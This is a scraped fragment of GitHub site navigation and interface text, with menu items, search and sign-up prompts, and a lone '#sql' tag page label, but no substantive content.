        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#sql